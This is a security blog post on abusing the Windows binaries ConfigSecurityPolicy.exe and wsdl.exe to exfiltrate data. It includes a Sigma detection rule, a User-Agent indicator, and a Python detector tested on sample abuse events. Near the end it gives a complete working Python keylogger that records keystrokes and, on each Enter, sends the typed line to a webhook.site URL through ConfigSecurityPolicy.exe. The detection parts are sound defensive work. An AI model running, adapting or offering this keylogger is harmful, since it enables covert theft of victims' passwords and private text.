
Data Exfiltration with LOLBins

The term “living off the land” (LOL) was coined by security researchers Christopher Campbell and Matt Graeber to describe the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which abuse Windows binaries to hide malicious activity; LOLLibs, which abuse libraries; and LOLScripts, which abuse scripts [1].

You can find a lot of these tricks in the LOLBAS project (Living Off The Land Binaries And Scripts, covering both LOLBins and LOLScripts): https://github.com/LOLBAS-Project/LOLBAS

My first discovery was a simple way to abuse the Microsoft Windows Defender utility ConfigSecurityPolicy.exe [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe”] to exfiltrate data:

[Screenshot: ConfigSecurityPolicy.exe]

Looking a little further, I found another way using wsdl.exe (Microsoft Web Services Description Language Utility). The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which generates a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:

[Screenshot: wsdl.exe]

Blueteam/Redteam tips:

  • UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
  • A simple Sigma rule to help detect possible insider-threat abuse of ConfigSecurityPolicy.exe (legitimate use passes an .xml policy file, so any invocation whose command line does not end in .xml is flagged):

    logsource:
      product: windows
      category: process_creation
    detection:
      selection:
        Image: '*\ConfigSecurityPolicy.exe'
      mandatory_cmdline:
        CommandLine|all:
          - '*ConfigSecurityPolicy.exe*'
          - '*.xml'
      condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins
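To show how the two blue team tips above turn into something you can actually run, here is an added Python example (my own code, not part of the original post or of any project the post mentions). It applies the Sigma rule's logic (selection and not mandatory_cmdline) to constructed Sysmon-style process-creation events, and scans constructed proxy log lines for the wsdl.exe User-Agent string listed above. The field names Image and CommandLine follow Sysmon Event ID 1, the proxy log layout is an assumption made for the example, and all sample events, hosts and URLs are constructed.

```python
import fnmatch
import re

# --- Part 1: the Sigma rule's logic over process-creation events ---------------
# Field names follow Sysmon Event ID 1 (Image, CommandLine), which is what a
# Windows 'process_creation' logsource usually maps to.
IMAGE_PATTERN = "*\\ConfigSecurityPolicy.exe"
# Legitimate use passes an .xml policy file, so BOTH patterns must match.
MANDATORY_CMDLINE = ["*ConfigSecurityPolicy.exe*", "*.xml"]

# --- Part 2: the wsdl.exe User-Agent reported in the post ---------------------
WSDL_UA_MARKER = "MS Web Services Client Protocol"

# Proxy log layout is an assumption made for this example:
# <timestamp> <client_ip> <method> <url> "<user-agent>"
PROXY_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def sigma_match(value, pattern):
    """Sigma-style wildcard match: case-insensitive, '*' spans any characters."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def is_suspicious_process(event):
    """Evaluate 'selection and not mandatory_cmdline' for one process event."""
    selection = sigma_match(event.get("Image", ""), IMAGE_PATTERN)
    mandatory = all(sigma_match(event.get("CommandLine", ""), p) for p in MANDATORY_CMDLINE)
    return selection and not mandatory


def find_wsdl_requests(proxy_lines):
    """Return (client_ip, url) for lines whose User-Agent carries the wsdl.exe marker."""
    hits = []
    for line in proxy_lines:
        m = PROXY_RE.match(line)
        if m and WSDL_UA_MARKER in m.group("ua"):
            hits.append((m.group("ip"), m.group("url")))
    return hits


# Constructed sample data (not real telemetry).
DEFENDER_DIR = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
PROCESS_EVENTS = [
    # legitimate: binary plus a policy .xml
    {"Image": DEFENDER_DIR + r"\ConfigSecurityPolicy.exe",
     "CommandLine": f'"{DEFENDER_DIR}\\ConfigSecurityPolicy.exe" C:\\Temp\\policy.xml'},
    # abuse pattern described in the post: an extra URL argument after the .xml
    {"Image": DEFENDER_DIR + r"\ConfigSecurityPolicy.exe",
     "CommandLine": f'"{DEFENDER_DIR}\\ConfigSecurityPolicy.exe" c:\\temp\\test.xml https://exfil.invalid/?Key.enter'},
    # unrelated process touching an .xml: must not fire
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Temp\policy.xml"},
]
PROXY_LINES = [
    '2020-09-20T10:15:01Z 10.0.0.5 GET https://exfil.invalid/api?q=c2VjcmV0 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)"',
    '2020-09-20T10:15:02Z 10.0.0.7 GET https://www.example.com/ '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/85.0"',
]


def run_checks(process_events=PROCESS_EVENTS, proxy_lines=PROXY_LINES):
    """Return the suspicious process command lines and the wsdl.exe proxy hits."""
    procs = [e["CommandLine"] for e in process_events if is_suspicious_process(e)]
    return procs, find_wsdl_requests(proxy_lines)


if __name__ == "__main__":
    procs, ua_hits = run_checks()
    for cmd in procs:
        print("ALERT process_creation:", cmd)
    for ip, url in ua_hits:
        print("ALERT wsdl.exe user-agent:", ip, url)
```

Running it flags only the second process event (the trailing URL means the command line no longer ends in .xml) and the first proxy line. The User-Agent check on its own will also catch genuine .NET web-service clients, so in practice you would correlate a hit with the process telemetry from the first check (which host, which binary, what command line) before treating it as exfiltration.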

A piece of code to help red team usage (thanks Neriberto Prado ❤): a simple keylogger that abuses Windows Defender's ConfigSecurityPolicy.exe to exfiltrate its logs:

# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import sys
import subprocess

URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""


def on_press(key):
    global content
    # Accumulate keystrokes; a backspace is recorded as a space
    if str(key) == 'Key.backspace':
        content += ' '
    else:
        content += str(key)
    print(f'last key: {str(key)}')
    print("")
    if str(key) == 'Key.enter':
        # On Enter, the buffered line is sent as the query string of the URL
        # that ConfigSecurityPolicy.exe is handed as its second argument
        upload_url = f'{URL}?{content}'
        subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
        content = ''  # reset the buffer (the original reset an unused variable)
    # Ctrl+C arrives as the control character \x03 on the key's .char attribute
    if getattr(key, 'char', None) == '\x03':
        sys.exit(0)


if __name__ == "__main__":
    try:
        with Listener(on_press=on_press) as listener:
            listener.join()
    except (KeyboardInterrupt, SystemExit):
        sys.exit(0)
[Screenshot: Proof of Concept]

MITRE ATT&CK Techniques:

  • ID: T1105
  • Sub-techniques: No sub-techniques
  • Tactic: Command And Control
  • Platforms: Linux, Windows, macOS
  • Permissions Required: User
  • Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, this is a simple and effective way to simulate possible tactics of your adversaries. I will be back soon with more tips.


reverse engineering and malware tales | LinkedIn: @isdebuggerpresent
